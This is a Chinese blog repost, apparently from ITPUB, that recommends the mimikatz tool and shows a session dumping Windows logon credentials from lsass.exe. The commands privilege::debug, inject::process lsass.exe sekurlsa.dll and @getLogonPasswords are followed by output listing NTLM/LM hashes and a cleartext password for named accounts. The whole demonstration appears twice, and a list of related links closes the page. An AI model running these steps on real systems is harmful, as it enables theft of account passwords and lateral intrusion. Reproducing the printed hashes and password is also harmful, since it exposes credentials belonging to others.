輕量級偵錯程式mimikatz
神器下載地址:
http://blog.gentilkiwi.com/mimikatz
還有一篇用這個神器直接從 lsass.exe 裡獲取windows處於active狀態賬號明文密碼的文章
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
測試:
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
[@more@]mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 1292
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;660047
Package d'authentification : NTLM
Utilisateur principal : __vmware_user__
Domaine d'authentification : LYP-1284
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 2454c4f215
a6da00ba5cbe2fa01cf929 }
wdigest : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
kerberos : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
Authentification Id : 0;162806
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;161318
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
Authentification Id : 0;996
Package d'authentification : Negotiate
Utilisateur principal : NETWORK SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d1
6ae931b73c59d7e0c089c0 }
wdigest :
kerberos :
Authentification Id : 0;71103
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos : n.t. (LUID KO)
Authentification Id : 0;999
Package d'authentification : NTLM
Utilisateur principal : LYP-1284$
Domaine d'authentification : HSX
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
mimikatz #
http://blog.gentilkiwi.com/mimikatz
還有一篇用這個神器直接從 lsass.exe 裡獲取windows處於active狀態賬號明文密碼的文章
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass
測試:
mimikatz 1.0 x86 (RC) /* Traitement du Kiwi (Sep 8 2012 15:18:27) */
// http://blog.gentilkiwi.com/mimikatz
[@more@]mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 1292
Attente de connexion du client...
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des données de sécurités dans LSASS
mimikatz # @getLogonPasswords
Authentification Id : 0;660047
Package d'authentification : NTLM
Utilisateur principal : __vmware_user__
Domaine d'authentification : LYP-1284
msv1_0 : lm{ 00000000000000000000000000000000 }, ntlm{ 2454c4f215
a6da00ba5cbe2fa01cf929 }
wdigest : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
kerberos : @GIsJ%z%qsHf3PHx#7c@BDCjiDc59_3*
Authentification Id : 0;162806
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;161318
Package d'authentification : NTLM
Utilisateur principal : l1284
Domaine d'authentification : LYP-1284
msv1_0 : lm{ fcd7cd0b55c54cb4aad3b435b51404ee }, ntlm{ e3e2cb3618
bd1e24e4f4536949ccc268 }
wdigest : sxxxxxx
kerberos : sxxxxxx
Authentification Id : 0;997
Package d'authentification : Negotiate
Utilisateur principal : LOCAL SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
Authentification Id : 0;996
Package d'authentification : Negotiate
Utilisateur principal : NETWORK SERVICE
Domaine d'authentification : NT AUTHORITY
msv1_0 : lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d1
6ae931b73c59d7e0c089c0 }
wdigest :
kerberos :
Authentification Id : 0;71103
Package d'authentification : NTLM
Utilisateur principal :
Domaine d'authentification :
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos : n.t. (LUID KO)
Authentification Id : 0;999
Package d'authentification : NTLM
Utilisateur principal : LYP-1284$
Domaine d'authentification : HSX
msv1_0 : n.t. (LUID KO)
wdigest : n.t. (LUID KO)
kerberos :
mimikatz #
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/678020/viewspace-1059498/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- Xcode偵錯程式LLDBXCodeLLDB
- Python 偵錯程式入門Python
- PsySH作為偵錯程式
- 偵錯程式到底怎樣工作
- [譯文]greenlet:輕量級併發程式
- 反除錯 -- 利用ptrace阻止偵錯程式附加除錯
- Emacs 除錯祕籍之 GUD 偵錯程式Mac除錯
- 偵錯程式是個大騙子!
- GDB偵錯程式(學習筆記)筆記
- Linux gdb偵錯程式用法全面解析Linux
- 另一個Swoole偵錯程式 - Yasd
- 輕量級多級選單控制框架程式(C語言)框架C語言
- 輕量級超級 css 工具CSS
- Rails開發中使用byebug偵錯程式AI
- 在Docker內部使用gdb偵錯程式報錯-Operation not permittedDockerMIT
- tokio-rs/console:非同步 Rust 偵錯程式非同步Rust
- 如何在Docker內部使用gdb偵錯程式Docker
- 2.IDEA,Maven,偵錯程式的基本使用IdeaMaven
- 反除錯&反反除錯 -- 利用sysctl檢測偵錯程式是否存在除錯
- 為什麼在Docker裡使用gdb偵錯程式會報錯Docker
- JAVA輕量級鎖簡介Java
- 輕量級配置中心Nodejs版NodeJS
- iOS 輕量級 HTML 解析方案iOSHTML
- python輕量級效能工具-LocustPython
- Flutter路由輕量級框架FRouterFlutter路由框架
- 輕量級orm框架——gzero指南ORM框架
- Spring的輕量級實現Spring
- 輕量級Web框架Flask(二)Web框架Flask
- Mimikatz ON Metasploit
- 幽默:編寫Python程式碼你們使用什麼偵錯程式?Python
- 5 個鮮為人知 GNU 偵錯程式(GDB)技巧
- 低程式碼之光!輕量級 GUI 的設計與實現GUI
- 輕量級API測試工具PandariaAPI
- Android輕量級事件通訊方案Android事件
- Golang web filter 輕量級實現GolangWebFilter
- Shottr for mac(輕量級截圖工具)Mac
- looter——超輕量級爬蟲框架爬蟲框架
- 專案輕量級部署神器:Fabric
- 前端輕量級資料庫mongodb前端資料庫MongoDB